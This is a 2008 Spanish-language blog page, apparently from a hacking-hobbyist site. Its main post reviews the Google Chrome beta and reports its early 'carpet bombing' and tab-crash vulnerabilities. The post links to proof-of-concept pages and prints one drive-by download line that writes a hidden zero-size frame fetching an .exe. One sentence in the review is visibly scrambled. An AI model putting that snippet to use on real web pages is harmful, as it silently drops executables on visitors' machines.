jueves, 11 de setiembre de 2008

Creando los autos de Fast Furious

Primero tenemos al Mitsubishi Eclipse una maravilla de auto:



Y ahora el Toyota Supra q es otro de los preciosos carros de esta gran pelicula:

Matrix fue la pelicula que inspiró a muchos Hackers

¿Quien no recuerda a Matrix? una película que inspiró a muchos hackers y que hoy se han convertido en jefes de seguridad informática. www.Hack-Lover.Blogspot.com les trae un extracto de una de las películas vista por muchos jóvenes aficionados al mundo de la informatica.


miércoles, 3 de setiembre de 2008

Nuevo Navegador Google Chrome Beta

Cuando no han pasado ni 24 horas desde que Google presentó su navegador web Google Chrome, ya se ha reportado la primera vulnerabilidad. Google Chrome es propenso al mismo problema que Safari hace unos meses, al “carpet bombing“, una vulnerabilidad llamada así por el investigador Aviv Raff que puede ser utilizada para descargar automáticamente archivos cuando el usuario navega por una página maliciosa. Raff ha publicado una prueba de concepto en la que se demuestra que los usuarios de Chrome pueden ser engañados para descargar y ejecutar archivos JAR sin ninguna advertencia de la aplicación, para ello se aprovecha de un fallo en el Webkit y un error de Java. Para que el exploit tenga éxito tan sólo se requiere que la víctima haga dos clic, lo cual se puede lograr con un poco de ingeniería social. Google Chrome está basado en Webkit, el problema es que el navegador de Google utiliza una versión anterior de este motor que es vulnerable. Por ahora la compañía del popular buscador no ha comentado nada al respecto, pero esperemos que pronto se publique una actualización.
Ahora podemos hablar de otra vulnerabilidad que han discutido mucho en la lista de full disclosure, se supone que una funcion importante de este navegador es que si crashea solo crashea una pestania.. bueno si ustedes escriben o visitan un link que contenga :% (dos puntos porciento) crashearan todas las tabs.
(fuente: http://evilfingers.com/advisory/google_chrome_poc.php)

Si entran con Chrome a la direccion de Aviv Raff del CarpetBombing:
http://raffon.net/research/google/chrome/carpet.html
Les creara un .JAR en su escritorio (o directorio de downloads default) el JAR es un Notepad en Java, pero podria ser cualquier cosa.

Se publico hace poco una variacion de este ataque que permite la descarga automatica de cualquier archivo pueden encontrar la info en http://milw0rm.com/exploits/6355 el codigo es el siguiente:


document.write('< src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

A pesar de los bug que pudiera tener lo analizamos bien y podemos decir que lo primero que notamos al abrirlo es su diseño minimalista. Bien por Google. Chrome es para navegar por Internet, no necesita tener un aspecto espectacular, ni efectos raros que consumen demasiados recursos al ordenador entorpeciendo su rendimiento. No obstante, el aspecto es más que suficiente.

Chrome lo muestra todo en una sola pantalla: búsqueda web (con Google, claro), historial, barra direcciones, etc. Además, la carga de páginas es mucho más rápida que con otros navegadores. Nosotros lo hemos comprobado, pero algunas webs lo han constatado gráficamente. Especialmente destaca en la ejecución de JavaScripts, es mucho más velozversión beta 8), Firefox 3 o Safari 3. que otros como Explorer (incluyendo su última

La navegación se hace por pestañas, como casi todos los actuales, pero aquí cada una es un proceso independiente. De esta forma, si una se bloquea, se puede cerrar sólo esta pestaña sin afectar al navegador al completo.

Por si fuera poco, es multiproceso, es decir, cada pestaña trabaja de manera independiente, agilizando la carga de las páginas sin estar afectadas por el resto. Así, se puede ver un vídeo en Youtube en una pestaña, mientras en otra se carga otra página, a la vez que nos bajamos un fichero. Todo esto sin que una tarea interfiera en la otra, ganando así mayor velocidad y estabilidad.

En este sentido es muy interesante el Gestor de tareas que incorpora Chrome. Se abre presionando Mayúsculas+Escape En él se puede ver lo que está consumiendo cada pestaña y determinados elementos de las webs, de forma que en un momento dado podemos finalizar el proceso que ralentice nuestra máquina.

El sistema de Favoritos y el Historial es prácticamente el mismo que el que utiliza Firefox por lo que los usuarios de éste estarán familiarizados con el funcionamiento. Los favoritos están en la parte derecha de la barra de marcadores. Se puede ocultar pulsando Ctrl+B. Al historial se accede mediante la combinación de teclas Ctrl+H.

El tema de la seguridad está muy cuidado. Primero, Chrome descarga periódicamente un par de listas negras (de phishing y spam) y avisa si las detecta mientras navegamos. Además, cada pestaña está preparada para impedir la instalación de software sin permiso del usuario (sandboxing). Por último tenemos el modo Incognito, que permite navegar, desde una pestaña, por Internet con la total seguridad de que no se registran nuestras actividades ni tampoco acepta cookies.

Sobre la compatibilidad con los estándares web, malas noticias. De momento esta versión beta no supera el test Acid3, uno de los más usados para analizar estos temas, aunque es cierto que su puntuación supera la de otros como Firefox 3 y IE 7.

Esta versión no tiene aún plugins, pero los tendrá. Es de esperar que siga la línea de Firefox, con plugins de la compañía y otros realizados por particulares pero supervisados.

No hay todavía disponible versión para Linux y Mac OS X, pero Google ya ha anunciado que está trabajando en ello y saldrán, aunque no ha querido mencionar ninguna fecha.

Como conclusión, estamos ante un navegador con un futuro muy prometedor, y que va a poner en serios apuros a los dos grandes: MS Internet Explorer y Mozilla Firefox. Chrome apuesta por la velocidad y estabilidad en la navegación y ha sabido coger lo mejor de la competencia y mejorarlo sin introducir demasiados cambios de navegación reduciendo así el esfuerzo de aprendizaje del usuario.